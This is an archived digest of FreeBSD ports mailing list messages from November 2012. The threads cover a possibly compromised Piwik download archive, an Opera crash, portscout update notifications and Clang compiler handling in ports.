owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 13:27:06 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 98BB84AE; Tue, 27 Nov 2012 13:27:06 +0000 (UTC) (envelope-from cvs-src@yandex.ru) Received: from forward2h.mail.yandex.net (forward2h.mail.yandex.net [IPv6:2a02:6b8:0:f05::2]) by mx1.freebsd.org (Postfix) with ESMTP id 04BA98FC08; Tue, 27 Nov 2012 13:27:06 +0000 (UTC) Received: from smtp4h.mail.yandex.net (smtp4h.mail.yandex.net [84.201.186.21]) by forward2h.mail.yandex.net (Yandex) with ESMTP id CD3C77010D9; Tue, 27 Nov 2012 17:27:04 +0400 (MSK) Received: from smtp4h.mail.yandex.net (localhost [127.0.0.1]) by smtp4h.mail.yandex.net (Yandex) with ESMTP id 819932C046B; Tue, 27 Nov 2012 17:27:04 +0400 (MSK) Received: from unknown (unknown [77.66.155.61]) by smtp4h.mail.yandex.net (nwsmtp/Yandex) with ESMTP id R2GONG9l-R3G0xMLq; Tue, 27 Nov 2012 17:27:04 +0400 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yandex.ru; s=mail; t=1354022824; bh=mIhxm/Fwpjl96GfV9wMObEADQ2jjH2chIXDJv+JBFl8=; h=Message-ID:Date:From:User-Agent:MIME-Version:To:CC:Subject: References:In-Reply-To:Content-Type:Content-Transfer-Encoding; b=VLPCEEv/4VChoILLMoNJ0r3uP/vQc4PvWr0gUUVSG++EhohpznE/J3uaaVDRC+P9F 5QgP+Dqc+rZhi4kpZ5lPgHmFpCooSkvM4XEkc3o0wEyQ0AFojjU+PIA+FVN91+2O8l JgcWtkl74SbXlom5EJcQOUt1llr1HfVm4Bn5aslU= Message-ID: <50B4BF95.8080704@yandex.ru> Date: Tue, 27 Nov 2012 17:26:45 +0400 From: Ruslan Mahmatkhanov User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: "Hans Fr. Nordhaug" Subject: Re: Fwd: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive References: <50B3CE75.9060107@grobecker-wtal.de> <50B4B6E9.9020605@yandex.ru> <20121127131905.GA3839@hiMolde.no> In-Reply-To: <20121127131905.GA3839@hiMolde.no> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Cc: FreeBSD Ports Mailing List , ports-secteam@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 13:27:06 -0000 Hans Fr. Nordhaug wrote on 27.11.2012 17:19: > Hi, > > I just noticed http://piwik.org/blog/2012/11/security-report-piwik-org-webserver-hacked-for-a-few-hours-on-2012-nov-26th/ > before I got this message. > > I downloaded http://builds.piwik.org/piwik-1.9.2.tar.gz > and compared it to my local copy of 1.9.2, and all files are unchanged. > It's just the archiving that changed the file size. The Piwik build > manager is a little bit sloppy ... > > Regards, > Hans Ok, but distinfo should be updated anyway because of this change. Would you please put original distfile somewhere? And if you approve, I can update the distinfo for you. -- Regards, Ruslan Tinderboxing kills... the drives. From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 14:09:58 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 8E92E452 for ; Tue, 27 Nov 2012 14:09:58 +0000 (UTC) (envelope-from ulrich@pukruppa.de) Received: from pukruppa.de (pd95cabe3.dip0.t-ipconnect.de [217.92.171.227]) by mx1.freebsd.org (Postfix) with ESMTP id 1A51C8FC15 for ; Tue, 27 Nov 2012 14:09:57 +0000 (UTC) Received: from pukruppa.de (localhost [127.0.0.1]) by pukruppa.de (8.14.5/8.14.5) with ESMTP id qARE8j6h052950 for ; Tue, 27 Nov 2012 15:08:46 +0100 (CET) (envelope-from ulrich@pukruppa.de) Message-ID: <50B4C96D.9040109@pukruppa.de> Date: Tue, 27 Nov 2012 15:08:45 +0100 From: Peter Ulrich Kruppa User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: freebsd-ports@freebsd.org Subject: Re: opera 12.11 References: <201211270534.31383.lumiwa@gmail.com> In-Reply-To: <201211270534.31383.lumiwa@gmail.com> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 14:09:58 -0000 On 27.11.2012 12:34, ajtiM wrote: > Hi! > > Update to Opera 12.11 and Opera-Linuxplugins 12.11 from 12.10 on my FreeBSD > 9.1 RC-3 doen't works anymore: > > opera > libpng error: incorrect data check > libpng error: incorrect data check > libpng error: incorrect data check > Segmentation fault (core dumped) It is quite a while since, but did you update your graphics/png properly? Please check /usr/ports/UPDATING 20120531 . Greetings Peter > > Thanks in advance. > > P.S. > > I used Clang to build Opera. > > Mitja > -------- > http://www.redbubble.com/people/lumiwa > _______________________________________________ > freebsd-ports@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-ports > To unsubscribe, send any mail to "freebsd-ports-unsubscribe@freebsd.org" > From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 15:00:14 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id F11FD31D for ; Tue, 27 Nov 2012 15:00:14 +0000 (UTC) (envelope-from zi@FreeBSD.org) Received: from exodus.zi0r.com (exodus.zi0r.com [71.245.171.203]) by mx1.freebsd.org (Postfix) with ESMTP id BC8A28FC12 for ; Tue, 27 Nov 2012 15:00:14 +0000 (UTC) Received: from exodus.zi0r.com (localhost [127.0.0.1]) by exodus.zi0r.com (Postfix) with ESMTP id 095FA3A522 for ; Tue, 27 Nov 2012 10:00:14 -0500 (EST) X-Virus-Scanned: amavisd-new at zi0r.com Received: from exodus.zi0r.com ([127.0.0.1]) by exodus.zi0r.com (exodus.zi0r.com [127.0.0.1]) (amavisd-new, port 10026) with LMTP id BEA8k-I7bB12 for ; Tue, 27 Nov 2012 10:00:12 -0500 (EST) Received: from exodus.zi0r.com (syn.zi0r.com [71.245.171.202]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by exodus.zi0r.com (Postfix) with ESMTPSA id 6BEAE3A504 for ; Tue, 27 Nov 2012 10:00:12 -0500 (EST) Date: Tue, 27 Nov 2012 10:00:10 -0500 From: Ryan Steinmetz To: ports@FreeBSD.org Subject: Portscout Notification Emails Message-ID: <20121127150010.GA16470@exodus.zi0r.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.21 (2010-09-15) X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 15:00:15 -0000 Greetings porters! As many of you are aware, an instance of portscout is available on http://portscout.freebsd.org/ For those of you who are unfamiliar with portscout, it is a tool which looks for new versions of software in the FreeBSD ports tree. Within the next week, we are planning on enabling portscout email notifications for all port maintainers. If you are currently a maintainer, and already know your preference about opting in or out of these updates, send a private email to zi@FreeBSD.org, and request that you are included or excluded. If you receive an alert for a given port, you will not receive another for that port until an even newer version is available. Multiple ports may be listed in a single notification. Thanks, -r Additional information: It is possible to control various aspects of portscouts behavior by setting the PORTSCOUT variable in your ports Makefile. Details can be found here: http://portscout.freebsd.org/info/portscout-portconfig.txt -- Ryan Steinmetz PGP: EF36 D45A 5CA9 28B1 A550 18CD A43C D111 7AD7 FAF2 From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 15:04:54 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 440753E3; Tue, 27 Nov 2012 15:04:54 +0000 (UTC) (envelope-from gahr@FreeBSD.org) Received: from cpanel09.rubas.ch (cpanel09.rubas.ch [195.182.222.79]) by mx1.freebsd.org (Postfix) with ESMTP id E50CD8FC14; Tue, 27 Nov 2012 15:04:53 +0000 (UTC) Received: from 98-41.199-178.cust.bluewin.ch ([178.199.41.98]:49810 helo=gahrfit.gahr.ch) by cpanel09.rubas.ch with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256) (Exim 4.80) (envelope-from ) id 1TdMiS-003CKy-9k; Tue, 27 Nov 2012 16:04:52 +0100 Date: Tue, 27 Nov 2012 16:04:49 +0100 From: Pietro Cerutti To: Ryan Steinmetz Subject: Re: Portscout Notification Emails Message-ID: <20121127150448.GL53110@gahrfit.gahr.ch> References: <20121127150010.GA16470@exodus.zi0r.com> MIME-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="VBq/nvTu32OVLBUP" Content-Disposition: inline In-Reply-To: <20121127150010.GA16470@exodus.zi0r.com> X-PGP-Key: 0x9571F78E X-PGP-Fingerprint: 1203 92B5 3919 AF84 9B97 28D6 C0C2 6A98 9571 F78E User-Agent: Mutt/1.5.21 (2010-09-15) X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - cpanel09.rubas.ch X-AntiAbuse: Original Domain - freebsd.org X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12] X-AntiAbuse: Sender Address Domain - FreeBSD.org Cc: ports@FreeBSD.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list Reply-To: gahr@FreeBSD.org List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 15:04:54 -0000 --VBq/nvTu32OVLBUP Content-Type: text/plain; charset=utf-8 Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 2012-Nov-27, 10:00, Ryan Steinmetz wrote: > Greetings porters! Hi Ryan, > As many of you are aware, an instance of portscout is available on > http://portscout.freebsd.org/ Awesome! Just a minor request, would it be possible to list maintainers in=20 http://portscout.freebsd.org/restricted-ports.html ? > If you are currently a maintainer, and already know your preference > about opting in or out of these updates, send a private email to > zi@FreeBSD.org, and request that you are included or excluded. Count me in. --=20 Pietro Cerutti The FreeBSD Project gahr@FreeBSD.org PGP Public Key: http://gahr.ch/pgp --VBq/nvTu32OVLBUP Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (FreeBSD) iEYEARECAAYFAlC01pAACgkQwMJqmJVx9449HQCg2HCi2+uMBtgBGMucGQDayrbO yHIAn1144qH623pdwwHDbPRtAc+OoLZU =mJdM -----END PGP SIGNATURE----- --VBq/nvTu32OVLBUP-- From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 15:54:10 2012 Return-Path: Delivered-To: ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id B9FA0706 for ; Tue, 27 Nov 2012 15:54:10 +0000 (UTC) (envelope-from portscout@portscout.freebsd.org) Received: from null.zi0r.com (null.zi0r.com [71.245.171.204]) by mx1.freebsd.org (Postfix) with ESMTP id 706FA8FC0C for ; Tue, 27 Nov 2012 15:54:10 +0000 (UTC) Received: from null.zi0r.com (localhost [127.0.0.1]) by null.zi0r.com (8.14.5/8.14.5) with ESMTP id qARFs9q2067246 for ; Tue, 27 Nov 2012 10:54:09 -0500 (EST) (envelope-from portscout@portscout.freebsd.org) Received: (from portscout@localhost) by null.zi0r.com (8.14.5/8.14.5/Submit) id qARFs9un067018; Tue, 27 Nov 2012 10:54:09 -0500 (EST) (envelope-from portscout) Message-Id: <201211271554.qARFs9un067018@null.zi0r.com> MIME-Version: 1.0 Content-Disposition: inline Content-Transfer-Encoding: 8bit Content-Type: text/plain Date: Tue, 27 Nov 2012 10:54:09 -0500 From: portscout@portscout.freebsd.org To: ports@freebsd.org Subject: FreeBSD ports you maintain which are out of date X-Mailer: portscout/0.8.1 X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 15:54:10 -0000 Dear port maintainer, The portscout new distfile checker has detected that one or more of your ports appears to be out of date. Please take the opportunity to check each of the ports listed below, and if possible and appropriate, submit/commit an update. If any ports have already been updated, you can safely ignore the entry. You will not be e-mailed again for any of the port/version combinations below. Full details can be found at the following URL: http://portscout.freebsd.org/ports@freebsd.org.html Port | Current version | New version ------------------------------------------------+-----------------+------------ biology/molden | 4.6 | 5.0.4 ------------------------------------------------+-----------------+------------ devel/ireport | 3.7.6 | 5.0.0 ------------------------------------------------+-----------------+------------ textproc/p5-Parse-PhoneNumber | 1.7 | 1.8 ------------------------------------------------+-----------------+------------ If any of the above results are invalid, please check the following page for details on how to improve portscout's detection and selection of distfiles on a per-port basis: http://portscout.freebsd.org/info/portscout-portconfig.txt If wish to stop receiving portscout reminders, please contact portscout@portscout.freebsd.org Thanks. From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 16:33:30 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 1499D98E; Tue, 27 Nov 2012 16:33:30 +0000 (UTC) (envelope-from tobias.rehbein@web.de) Received: from mout.web.de (mout.web.de [212.227.17.12]) by mx1.freebsd.org (Postfix) with ESMTP id 945DD8FC12; Tue, 27 Nov 2012 16:33:29 +0000 (UTC) Received: from oshi.local ([78.46.133.223]) by smtp.web.de (mrweb002) with ESMTPSA (Nemesis) id 0LjJaZ-1T5yKY2vBH-00d2e2; Tue, 27 Nov 2012 17:27:42 +0100 Received: from oshi.local (localhost [127.0.0.1]) by oshi.local (8.14.5/8.14.5) with ESMTP id qARGRbjZ002456; Tue, 27 Nov 2012 17:27:37 +0100 (CET) (envelope-from tobi@oshi.local) Received: (from tobi@localhost) by oshi.local (8.14.5/8.14.5/Submit) id qARGRb5X002455; Tue, 27 Nov 2012 17:27:37 +0100 (CET) (envelope-from tobi) Date: Tue, 27 Nov 2012 17:27:37 +0100 From: Tobias Rehbein To: Alberto Villa Subject: Re: How to handle WITH_CLANG_IS_CC in ports Message-ID: <20121127162737.GB1790@oshi.local> References: <20121125114918.GA35966@oshi.local> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: User-Agent: Mutt/1.5.21 (2010-09-15) X-Provags-ID: V02:K0:GO5V4+jVGc9ElRoYmPzZqs7G72mTHwVte6k9/RUr3Pa yse/YkvDoz0D2gHI83GcxkJDA1q3QYnQSQXqcqqsa8LYA0+GE0 kch73c+MuUBUZgwL/bW4GBuKgSZdcqS4nmxcuPZwbzyebpRLkZ TMIn2dEN14CARiuRxUO6I34BAEjE39QRKFeHgUYa+S351ICSRL KnJn03ApOmSRqHQt1z5Ew== Cc: Nikolai Lifanov , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 16:33:30 -0000 Am Mon, Nov 26, 2012 at 05:07:01PM +0100 schrieb Alberto Villa: > For Qt 5 (and, soon, Qt 4 as well) I'm copying the logic of > bsd.compiler.mk. Is there any chance you turn this into a generic Mk macro? Regards Tobias From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 16:37:48 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 63A57B71; Tue, 27 Nov 2012 16:37:48 +0000 (UTC) (envelope-from tobias.rehbein@web.de) Received: from mout.web.de (mout.web.de [212.227.15.4]) by mx1.freebsd.org (Postfix) with ESMTP id E37918FC13; Tue, 27 Nov 2012 16:37:47 +0000 (UTC) Received: from oshi.local ([78.46.133.223]) by smtp.web.de (mrweb103) with ESMTPSA (Nemesis) id 0M6UxL-1TKDQy3eDj-00yMkG; Tue, 27 Nov 2012 17:23:52 +0100 Received: from oshi.local (localhost [127.0.0.1]) by oshi.local (8.14.5/8.14.5) with ESMTP id qARGNpgr001814; Tue, 27 Nov 2012 17:23:51 +0100 (CET) (envelope-from tobi@oshi.local) Received: (from tobi@localhost) by oshi.local (8.14.5/8.14.5/Submit) id qARGNoQt001813; Tue, 27 Nov 2012 17:23:50 +0100 (CET) (envelope-from tobi) Date: Tue, 27 Nov 2012 17:23:50 +0100 From: Tobias Rehbein To: Dimitry Andric Subject: Re: How to handle WITH_CLANG_IS_CC in ports Message-ID: <20121127162350.GA1790@oshi.local> References: <20121125114918.GA35966@oshi.local> <50B23382.3030600@FreeBSD.org> <50B387BB.3000502@mail.lifanov.com> <50B38FCC.4050902@FreeBSD.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <50B38FCC.4050902@FreeBSD.org> User-Agent: Mutt/1.5.21 (2010-09-15) X-Provags-ID: V02:K0:3hNcff289bgvHqpdDdr1S3tz1XxQAGB+wiRgvNtncbZ H/rkKH9ghUNKsXvhkTOU+dE1xyKEOAi4UODK+Nd80xXcTLoJGr 5SNx7ENIVZ4oyRLfZP0fau4j6zsddzISFEJKBaYIw/XCYWARfX 6b/PtKcL16guDhUF0B80OWI9D4cwTVT1kew28CNLAxdYkiPe4Z hTkE4JyoQL2/3GITknLZQ== Cc: Nikolai Lifanov , freebsd-ports@freebsd.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 16:37:48 -0000 Am Mon, Nov 26, 2012 at 04:50:36PM +0100 schrieb Dimitry Andric: > On 2012-11-26 16:16, Nikolai Lifanov wrote: > > > > On 11/25/2012 10:04 AM, Dimitry Andric wrote: > > This is bad. > > People with OSVERSION >= 1000024 and WITHOUT_CLANG_IS_CC set will be > > left out. > > Well, this was just a simple example, I'm sure you can figure out a > zillion interesting ways to do this. :-) But what I'm looking for is the right(TM) way to do it. With the switch to clang as cc, I supposed there would be already a best practice. Regards Tobias / blabber From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 16:44:46 2012 Return-Path: Delivered-To: freebsd-ports@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id B80DC1B2 for ; Tue, 27 Nov 2012 16:44:46 +0000 (UTC) (envelope-from jakub_lach@mailplus.pl) Received: from sam.nabble.com (sam.nabble.com [216.139.236.26]) by mx1.freebsd.org (Postfix) with ESMTP id 90EC18FC0C for ; Tue, 27 Nov 2012 16:44:46 +0000 (UTC) Received: from [192.168.236.26] (helo=sam.nabble.com) by sam.nabble.com with esmtp (Exim 4.72) (envelope-from ) id 1TdOH2-0003xd-NF for freebsd-ports@freebsd.org; Tue, 27 Nov 2012 08:44:40 -0800 Date: Tue, 27 Nov 2012 08:44:40 -0800 (PST) From: Jakub Lach To: freebsd-ports@freebsd.org Message-ID: <1354034680714-5764667.post@n5.nabble.com> In-Reply-To: <201211270534.31383.lumiwa@gmail.com> References: <201211270534.31383.lumiwa@gmail.com> Subject: Re: opera 12.11 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 16:44:46 -0000 > I used Clang to build Opera. I'm doubting that :) Anyway, they are already at 12.12 RC so do not get too used to 12.11... -- View this message in context: http://freebsd.1045724.n5.nabble.com/opera-12-11-tp5764588p5764667.html Sent from the freebsd-ports mailing list archive at Nabble.com. From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 18:38:15 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 467DDF3F; Tue, 27 Nov 2012 18:38:15 +0000 (UTC) (envelope-from ohauer@FreeBSD.org) Received: from p578be941.dip0.t-ipconnect.de (p578be941.dip0.t-ipconnect.de [87.139.233.65]) by mx1.freebsd.org (Postfix) with ESMTP id F16BD8FC15; Tue, 27 Nov 2012 18:38:14 +0000 (UTC) Received: from [192.168.0.100] (cde1100.uni.vrs [192.168.0.100]) (Authenticated sender: ohauer) by p578be941.dip0.t-ipconnect.de (Postfix) with ESMTPSA id 1118520908; Tue, 27 Nov 2012 19:38:04 +0100 (CET) Message-ID: <50B50889.5040401@FreeBSD.org> Date: Tue, 27 Nov 2012 19:38:01 +0100 From: Olli Hauer User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/17.0 Thunderbird/17.0 MIME-Version: 1.0 To: ports@FreeBSD.org Subject: Re: Portscout Notification Emails References: <20121127150010.GA16470@exodus.zi0r.com> In-Reply-To: <20121127150010.GA16470@exodus.zi0r.com> X-Enigmail-Version: 1.4.6 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Cc: Ryan Steinmetz X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 18:38:15 -0000 On 2012-11-27 16:00, Ryan Steinmetz wrote: > Greetings porters! > > As many of you are aware, an instance of portscout is available on > http://portscout.freebsd.org/ > > For those of you who are unfamiliar with portscout, it is a tool which > looks for new versions of software in the FreeBSD ports tree. > > Within the next week, we are planning on enabling portscout email > notifications for all port maintainers. > > If you are currently a maintainer, and already know your preference > about opting in or out of these updates, send a private email to > zi@FreeBSD.org, and request that you are included or excluded. > > If you receive an alert for a given port, you will not receive another > for that port until an even newer version is available. Multiple ports > may be listed in a single notification. > > Thanks, > -r > Hi Ryan, would you mind to start over with a current ports-tree *and* a fresh portscout DB, or do a cleanup and remove ports which are no longer in the tree? For example the following 42 ports are removed since 2012-01-01 but are listed for apache@. apache-contrib apache13 apache13+ipv6 apache13-modperl apache13-ssl auth_ldap mod_access_identd mod_access_referer mod_accounting mod_auth_cookie_mysql mod_auth_external mod_auth_imap mod_auth_kerb mod_auth_mysql mod_auth_pam mod_auth_pgsql mod_auth_useragent mod_backhand mod_bandwidth mod_bf mod_blowchunks mod_bunzip2 mod_cgi_debug mod_color mod_curb mod_dav mod_extract_forwarded_ap13 mod_filter mod_index_rss mod_layout mod_log_spread mod_mp3 mod_mylo mod_perl mod_proxy_add_forward mod_put mod_python mod_sed mod_sequester mod_shapvh mod_sqlinclude mod_ticket mod_trigger mod_cvs -> removed but sends update requests for mod_cvs2 mod_macro -> removed but sends updates for mod_macro22 Thanks, olli From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 18:39:37 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 7CAF517A; Tue, 27 Nov 2012 18:39:37 +0000 (UTC) (envelope-from zi@FreeBSD.org) Received: from exodus.zi0r.com (exodus.zi0r.com [71.245.171.203]) by mx1.freebsd.org (Postfix) with ESMTP id 46C618FC14; Tue, 27 Nov 2012 18:39:37 +0000 (UTC) Received: from exodus.zi0r.com (localhost [127.0.0.1]) by exodus.zi0r.com (Postfix) with ESMTP id 8F9B93A522; Tue, 27 Nov 2012 13:39:36 -0500 (EST) X-Virus-Scanned: amavisd-new at zi0r.com Received: from exodus.zi0r.com ([127.0.0.1]) by exodus.zi0r.com (exodus.zi0r.com [127.0.0.1]) (amavisd-new, port 10026) with LMTP id ujhot-CcuSPN; Tue, 27 Nov 2012 13:39:36 -0500 (EST) Received: from exodus.zi0r.com (syn.zi0r.com [71.245.171.202]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by exodus.zi0r.com (Postfix) with ESMTPSA id DA0F53A504; Tue, 27 Nov 2012 13:39:35 -0500 (EST) Date: Tue, 27 Nov 2012 13:39:34 -0500 From: Ryan Steinmetz To: Olli Hauer Subject: Re: Portscout Notification Emails Message-ID: <20121127183934.GA94315@exodus.zi0r.com> References: <20121127150010.GA16470@exodus.zi0r.com> <50B50889.5040401@FreeBSD.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <50B50889.5040401@FreeBSD.org> User-Agent: Mutt/1.5.21 (2010-09-15) Cc: ports@FreeBSD.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 18:39:37 -0000 On (11/27/12 19:38), Olli Hauer wrote: > Hi Ryan, > > would you mind to start over with a current ports-tree *and* a fresh portscout > DB, or do a cleanup and remove ports which are no longer in the tree? > > > For example the following 42 ports are removed since 2012-01-01 but are listed > for apache@. > > apache-contrib apache13 apache13+ipv6 apache13-modperl apache13-ssl auth_ldap > mod_access_identd mod_access_referer mod_accounting mod_auth_cookie_mysql > mod_auth_external mod_auth_imap mod_auth_kerb mod_auth_mysql mod_auth_pam > mod_auth_pgsql mod_auth_useragent mod_backhand mod_bandwidth mod_bf > mod_blowchunks mod_bunzip2 mod_cgi_debug mod_color mod_curb mod_dav > mod_extract_forwarded_ap13 mod_filter mod_index_rss mod_layout mod_log_spread > mod_mp3 mod_mylo mod_perl mod_proxy_add_forward mod_put mod_python mod_sed > mod_sequester mod_shapvh mod_sqlinclude mod_ticket mod_trigger > > mod_cvs -> removed but sends update requests for mod_cvs2 > mod_macro -> removed but sends updates for mod_macro22 > > Currently investigating this. -r > Thanks, > olli -- Ryan Steinmetz PGP: EF36 D45A 5CA9 28B1 A550 18CD A43C D111 7AD7 FAF2 From owner-freebsd-ports@FreeBSD.ORG Tue Nov 27 19:20:44 2012 Return-Path: Delivered-To: ports@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [69.147.83.52]) by hub.freebsd.org (Postfix) with ESMTP id 303D914D; Tue, 27 Nov 2012 19:20:44 +0000 (UTC) (envelope-from zi@FreeBSD.org) Received: from exodus.zi0r.com (exodus.zi0r.com [71.245.171.203]) by mx1.freebsd.org (Postfix) with ESMTP id F10068FC15; Tue, 27 Nov 2012 19:20:43 +0000 (UTC) Received: from exodus.zi0r.com (localhost [127.0.0.1]) by exodus.zi0r.com (Postfix) with ESMTP id 4D3DC3A537; Tue, 27 Nov 2012 14:20:43 -0500 (EST) X-Virus-Scanned: amavisd-new at zi0r.com Received: from exodus.zi0r.com ([127.0.0.1]) by exodus.zi0r.com (exodus.zi0r.com [127.0.0.1]) (amavisd-new, port 10026) with LMTP id a5NjrX_qg5Hl; Tue, 27 Nov 2012 14:20:42 -0500 (EST) Received: from exodus.zi0r.com (syn.zi0r.com [71.245.171.202]) (using TLSv1 with cipher DHE-RSA-AES256-SHA (256/256 bits)) (No client certificate requested) by exodus.zi0r.com (Postfix) with ESMTPSA id 09CEF3A504; Tue, 27 Nov 2012 14:20:42 -0500 (EST) Date: Tue, 27 Nov 2012 14:20:40 -0500 From: Ryan Steinmetz To: Olli Hauer Subject: Re: Portscout Notification Emails Message-ID: <20121127192040.GD98092@exodus.zi0r.com> References: <20121127150010.GA16470@exodus.zi0r.com> <50B50889.5040401@FreeBSD.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <50B50889.5040401@FreeBSD.org> User-Agent: Mutt/1.5.21 (2010-09-15) Cc: ports@FreeBSD.org X-BeenThere: freebsd-ports@freebsd.org X-Mailman-Version: 2.1.14 Precedence: list List-Id: Porting software to FreeBSD List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 27 Nov 2012 19:20:44 -0000 On (11/27/12 19:38), Olli Hauer wrote: > Hi Ryan, > > would you mind to start over with a current ports-tree *and* a fresh portscout > DB, or do a cleanup and remove ports which are no longer in the tree? > This has been resolved. Part of the bits that process deleted ports was not working as expected. -r > > For example the following 42 ports are removed since 2012-01-01 but are listed > for apache@. > > apache-contrib apache13 apache13+ipv6 apache13-modperl apache13-ssl auth_ldap > mod_access_identd mod_access_referer mod_accounting mod_auth_cookie_mysql > mod_auth_external mod_auth_imap mod_auth_kerb mod_auth_mysql mod_auth_pam > mod_auth_pgsql mod_auth_useragent mod_backhand mod_bandwidth mod_bf > mod_blowchunks mod_bunzip2 mod_cgi_debug mod_color mod_curb mod_dav > mod_extract_forwarded_ap13 mod_filter mod_index_rss mod_layout mod_log_spread > 